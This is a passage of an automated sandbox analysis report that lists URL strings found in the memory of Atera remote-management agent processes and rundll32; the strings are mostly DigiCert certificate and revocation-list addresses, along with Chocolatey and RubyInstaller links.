                                Source: AteraAgent.exe, 00000010.00000002.2527805921.000002BEFBE59000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2529295221.000002BEFBE7E000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2911371890.0000021B6A87A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt
                                Source: rundll32.exe, 00000003.00000003.1834753750.0000000004881000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1844449479.0000000004E1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1895265835.0000000004E3C000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2498500115.000002BE80647000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2498500115.000002BE806BB000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2529295221.000002BEFBE7E000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2530004307.000002BEFBEF2000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2527805921.000002BEFBDC0000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2529295221.000002BEFBED8000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2533920469.000002BEFC295000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2498500115.000002BE8028C000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1990755362.00000000042D4000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000014.00000002.2188999803.00000167EA688000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000015.00000002.2189043377.00000280D39CE000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000015.00000002.2189043377.00000280D397C000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2825307729.0000021B52A88000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2915185997.0000021B6AC04000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2915185997.0000021B6ABEF000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2825307729.0000021B52848000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2825307729.0000021B5263C000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2911371890.0000021B6A7C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                                Source: AteraAgent.exe, 0000001A.00000002.2911371890.0000021B6A87A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crtq
                                Source: AteraAgent.exe, 0000001A.00000002.2911371890.0000021B6A87A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crty
                                Source: rundll32.exe, 00000003.00000003.1834753750.0000000004881000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1844449479.0000000004E1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1895265835.0000000004E3C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1990755362.00000000042D4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000038.00000003.2676474394.0000000004CE0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003B.00000003.2688648705.000000000449E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/NETFoundationProjectsCodeSigningCA.crt0
                                Source: rundll32.exe, 00000003.00000003.1834753750.0000000004881000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1844449479.0000000004E1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1895265835.0000000004E3C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1990755362.00000000042D4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000038.00000003.2676474394.0000000004CE0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003B.00000003.2688648705.000000000449E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/NETFoundationProjectsCodeSigningCA2.crt0
                                Source: AteraAgent.exe, 00000010.00000002.2527805921.000002BEFBE59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/indD
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4D12000.00000002.00000001.01000000.0000004F.sdmpString found in binary or memory: http://cdn.rubyinstaller.org/archives/devkits/DevKit-mingw64-32-4.7.2-20130224-1151-sfx.exe
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4D12000.00000002.00000001.01000000.0000004F.sdmpString found in binary or memory: http://cdn.rubyinstaller.org/archives/devkits/DevKit-mingw64-64-4.7.2-20130224-1432-sfx.exe
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3072832109.000002C38BF5C000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 0000003C.00000002.3072832109.000002C38BF58000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 0000003C.00000002.3153901428.000002C39BDFD000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 0000003C.00000002.3072832109.000002C38C3A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://community.chocolatey.org/api/v2/
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3153901428.000002C39BDFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://community.chocolatey.org/api/v2/Packages(Id=
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3072832109.000002C38BF58000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 0000003C.00000002.3153901428.000002C39BDFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://community.chocolatey.org/api/v2/Search
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3072832109.000002C38BF58000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 0000003C.00000002.3153901428.000002C39BDFD000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 0000003C.00000002.3072832109.000002C38BF54000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 0000003C.00000002.3072832109.000002C38BFAB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://community.chocolatey.org/api/v2/Search?searchTerm=
                                Source: AteraAgent.exe, 00000010.00000002.2527011175.000002BEFBA1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                                Source: rundll32.exe, 00000004.00000002.1891561818.0000000007A40000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2911371890.0000021B6A87A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micros
                                Source: AteraAgent.exe, 00000010.00000002.2533609714.000002BEFC26F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ssc.lt/root-a/cacrl.crl0
                                Source: AteraAgent.exe, 00000010.00000002.2533920469.000002BEFC295000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ssc.lt/root-c/cacrl.crl0
                                Source: rundll32.exe, 00000003.00000003.1834753750.0000000004881000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1844449479.0000000004E1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1895265835.0000000004E3C000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2498500115.000002BE80647000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2498500115.000002BE806BB000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2529295221.000002BEFBED8000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2533920469.000002BEFC295000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2498500115.000002BE8028C000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2527805921.000002BEFBDD2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1990755362.00000000042D4000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2825307729.0000021B52A88000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2915185997.0000021B6ABC1000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2825307729.0000021B52848000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2825307729.0000021B5263C000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2911371890.0000021B6A7C8000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2825307729.0000021B5285B000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2825307729.0000021B526ED000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2915185997.0000021B6AC34000.00000004.00000020.00020000.00000000.sdmp, AgentPackageUpgradeAgent.exe, 0000002E.00000002.2967904200.000001AF6BDEB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000038.00000003.2676474394.0000000004CE0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003B.00000003.2688648705.000000000449E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4F94000.00000002.00000001.01000000.0000004F.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                                Source: rundll32.exe, 00000003.00000003.1834753750.0000000004881000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1844449479.0000000004E1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1895265835.0000000004E3C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1990755362.00000000042D4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000038.00000003.2676474394.0000000004CE0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003B.00000003.2688648705.000000000449E000.00000004.00000020.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4F94000.00000002.00000001.01000000.0000004F.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
                                Source: rundll32.exe, 00000003.00000003.1834753750.0000000004881000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1844449479.0000000004E1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1895265835.0000000004E3C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1990755362.00000000042D4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000038.00000003.2676474394.0000000004CE0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003B.00000003.2688648705.000000000449E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertCSRSA4096RootG5.crl0
                                Source: rundll32.exe, 00000003.00000003.1834753750.0000000004881000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1844449479.0000000004E1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1895265835.0000000004E3C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1990755362.00000000042D4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000038.00000003.2676474394.0000000004CE0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003B.00000003.2688648705.000000000449E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0=
                                Source: AteraAgent.exe, 0000000C.00000002.1975238752.0000016E75DBF000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000C.00000002.1975521513.0000016E75E06000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000C.00000002.1974508605.0000016E73A60000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000C.00000002.1975422901.0000016E75DE2000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2529295221.000002BEFBEA0000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2527805921.000002BEFBE59000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2527805921.000002BEFBDD2000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2915185997.0000021B6AB60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl
                                Source: AteraAgent.exe, 0000001A.00000002.2915185997.0000021B6AB60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl-
                                Source: AteraAgent.exe, 0000000C.00000002.1975925687.0000016E760AA000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000C.00000002.1975152103.0000016E75D10000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000C.00000002.1973450620.0000016E000BA000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2525824499.000002BEFB9F0000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2530004307.000002BEFBF00000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2498500115.000002BE807B8000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2525824499.000002BEFB970000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2527805921.000002BEFBE17000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2525824499.000002BEFB97C000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2498500115.000002BE80682000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2498500115.000002BE802D2000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2498500115.000002BE803B1000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2498500115.000002BE80647000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2498500115.000002BE806BB000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2529295221.000002BEFBE7E000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2498500115.000002BE80477000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2529295221.000002BEFBED8000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2527805921.000002BEFBDFE000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2498500115.000002BE802C2000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2533920469.000002BEFC295000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2527805921.000002BEFBE07000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                                Source: AteraAgent.exe, 00000010.00000002.2527805921.000002BEFBDD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl5
                                Source: AteraAgent.exe, 00000010.00000002.2527805921.000002BEFBE59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl?
                                Source: AteraAgent.exe, 0000001A.00000002.2915185997.0000021B6ABDC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crlhttp://crl4.digicert.co
                                Source: AteraAgent.exe, 0000000C.00000002.1975152103.0000016E75D10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crlpR
                                Source: AteraAgent.exe, 00000010.00000002.2530004307.000002BEFBEF2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.cr
                                Source: rundll32.exe, 00000003.00000003.1834753750.0000000004881000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1844449479.0000000004E1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1895265835.0000000004E3C000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000C.00000002.1975152103.0000016E75D10000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2498500115.000002BE80647000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2498500115.000002BE806BB000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2529295221.000002BEFBED8000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2533920469.000002BEFC295000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2527805921.000002BEFBE07000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2498500115.000002BE8028C000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1990755362.00000000042D4000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2825307729.0000021B52A88000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2915185997.0000021B6ABEF000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2825307729.0000021B52848000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2825307729.0000021B5263C000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2825307729.0000021B5285B000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2911371890.0000021B6A87A000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2825307729.0000021B526ED000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2915185997.0000021B6AC34000.00000004.00000020.00020000.00000000.sdmp, AgentPackageUpgradeAgent.exe, 0000002E.00000002.2941460212.000001AF0015F000.00000004.00000800.00020000.00000000.sdmp, AgentPackageUpgradeAgent.exe, 0000002E.00000002.2967904200.000001AF6BDEB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                                Source: AteraAgent.exe, 0000000C.00000002.1975238752.0000016E75D6F000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000C.00000002.1975925687.0000016E76070000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2527805921.000002BEFBDD2000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2915185997.0000021B6ABEF000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2911371890.0000021B6A87A000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2915185997.0000021B6AB60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl
                                Source: AteraAgent.exe, 0000001A.00000002.2911371890.0000021B6A87A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl-
                                Source: AgentPackageUpgradeAgent.exe, 0000002E.00000002.2967904200.000001AF6BDEB000.00000004.00000020.00020000.00000000.sdmp, AgentPackageUpgradeAgent.exe, 0000002E.00000002.2967904200.000001AF6BD20000.00000004.00000020.00020000.00000000.sdmp, AgentPackageUpgradeAgent.exe, 0000002E.00000002.2941460212.000001AF00163000.00000004.00000800.00020000.00000000.sdmp, AgentPackageTicketing.exe, 00000032.00000002.3326560482.00000277F85E0000.00000004.00000020.00020000.00000000.sdmp, AgentPackageOsUpdates.exe, 00000034.00000002.2826793308.000001FC60A80000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000038.00000003.2676474394.0000000004CE0000.00000004.00000020.00020000.00000000.sdmp, AgentPackageInternalPoller.exe, 00000039.00000002.2730506028.000001AA4B780000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003B.00000003.2770793562.0000000002C43000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003B.00000003.2688648705.000000000449E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003B.00000002.2773621288.0000000002C43000.00000004.00000020.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 0000003C.00000002.3172608638.000002C3A48EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                                Source: AteraAgent.exe, 0000001A.00000002.2915185997.0000021B6ABEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl1
                                Source: AteraAgent.exe, 0000001A.00000002.2915185997.0000021B6ABEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl=
                                Source: AteraAgent.exe, 0000000C.00000002.1975152103.0000016E75D10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crlL
                                Source: AteraAgent.exe, 00000010.00000002.2527805921.000002BEFBDD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crlR
                                Source: AteraAgent.exe, 0000001A.00000002.2911371890.0000021B6A87A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crlU
                                Source: AteraAgent.exe, 0000001A.00000002.2915185997.0000021B6ABEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crlW
                                Source: AteraAgent.exe, 0000001A.00000002.2911371890.0000021B6A87A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crle
                                Source: AteraAgent.exe, 0000001A.00000002.2911371890.0000021B6A87A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crli
                                Source: AteraAgent.exe, 0000000C.00000002.1975238752.0000016E75D6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crlkage
                                Source: AteraAgent.exe, 0000001A.00000002.2915185997.0000021B6AB60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crlx
                                Source: rundll32.exe, 00000003.00000003.1834753750.0000000004881000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1844449479.0000000004E1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1895265835.0000000004E3C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1990755362.00000000042D4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000038.00000003.2676474394.0000000004CE0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003B.00000003.2688648705.000000000449E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/NETFoundationProjectsCodeSigningCA.crl0E
                                Source: rundll32.exe, 00000003.00000003.1834753750.0000000004881000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1844449479.0000000004E1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1895265835.0000000004E3C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1990755362.00000000042D4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000038.00000003.2676474394.0000000004CE0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003B.00000003.2688648705.000000000449E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0F
                                Source: AteraAgent.exe, 0000000C.00000002.1975238752.0000016E75D6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/lLt
                                Source: AteraAgent.exe, 0000000C.00000002.1975238752.0000016E75D6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/lPt
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4F94000.00000002.00000001.01000000.0000004F.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                                Source: rundll32.exe, 00000003.00000003.1834753750.0000000004881000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1844449479.0000000004E1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1895265835.0000000004E3C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1990755362.00000000042D4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000038.00000003.2676474394.0000000004CE0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003B.00000003.2688648705.000000000449E000.00000004.00000020.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4F94000.00000002.00000001.01000000.0000004F.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
                                Source: AteraAgent.exe, 0000000C.00000002.1975422901.0000016E75DE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com:80/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crlrlCache
                                Source: AteraAgent.exe, 0000000C.00000002.1975422901.0000016E75DE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com:80/DigiCertTrustedRootG4.crlPe
                                Source: AteraAgent.exe, 0000000C.00000002.1975238752.0000016E75D6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/
                                Source: rundll32.exe, 00000003.00000003.1834753750.0000000004881000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1844449479.0000000004E1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1895265835.0000000004E3C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1990755362.00000000042D4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000038.00000003.2676474394.0000000004CE0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003B.00000003.2688648705.000000000449E000.00000004.00000020.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4F94000.00000002.00000001.01000000.0000004F.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                                Source: AteraAgent.exe, 0000000C.00000002.1975152103.0000016E75D10000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000C.00000002.1975238752.0000016E75DBF000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000C.00000002.1975422901.0000016E75DE2000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2498500115.000002BE807B8000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2498500115.000002BE80682000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2529295221.000002BEFBEA0000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2498500115.000002BE802D2000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2498500115.000002BE803B1000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2527805921.000002BEFBE59000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2498500115.000002BE80477000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2498500115.000002BE802C2000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2527805921.000002BEFBDD2000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2825307729.0000021B52A88000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 